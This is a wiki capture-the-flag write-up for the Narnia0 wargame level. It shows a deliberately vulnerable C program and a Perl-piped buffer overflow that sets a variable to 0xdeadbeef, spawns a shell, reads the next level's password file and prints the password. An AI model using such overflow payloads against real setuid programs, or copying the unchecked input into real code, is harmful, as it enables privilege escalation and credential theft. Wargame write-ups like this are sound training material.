Narnia0 - narnia1

From JaxHax
Jump to: navigation, search

Code

//narnia0@melinda:/narnia$ cat narnia0.c
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
 
int main(){
	long val=0x41414141;
	char buf[20];
 
	printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	printf("Here is your chance: ");
	scanf("%24s",&buf);
 
	printf("buf: %s\n",buf);
	printf("val: 0x%08x\n",val);
 
	if(val==0xdeadbeef)
		system("/bin/sh");
	else {
		printf("WAY OFF!!!!\n");
		exit(1);
	}
 
	return 0;
}


Solution

First let's give it a test run.

narnia0@melinda:/narnia$ ./narnia0  
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: test
buf: test
 
val: 0x41414141
 
WAY OFF!!!!


This appears to be a simple buffer overflow. The most difficult part of exploiting this is it wants to read through STDIN rather than taking the exploit as an argv. The first thing we need to do is see how many bytes are needed to reach val. Our buffer is 20 bytes, so let's try 20 + 4.

narnia0@melinda:/narnia$ perl -e 'print "A"x20; print "BBBB";' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAABBBB
 
val: 0x42424242
 
WAY OFF!!!!
 
narnia0@melinda:/narnia$


Bingo! That's what we need to overflow the val. The val now equals 0x42424242 which is "BBBB". Now we can make it equal to 0xdeadbeef. This needs to be in little endian. so basically backwards.

narnia0@melinda:/narnia$ perl -e 'print "A"x20; print "\xef\xbe\xad\xde";' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
 
narnia0@melinda:/narnia$


This does what we need, but doesn't give our shell... So we will try to run the commands inline. First we need to overflow it. Then inject our commands.

narnia0@melinda:/narnia$ ((perl -e 'print "A"x20; print "\xef\xbe\xad\xde";'; exit;); echo whoami) | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
narnia1


Works well enough... Now let's go after that password file...

narnia0@melinda:/narnia$ ((perl -e 'print "A"x20; print "\xef\xbe\xad\xde";'; exit;); echo cat /etc/narnia_pass/narnia1) | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
efeidiedae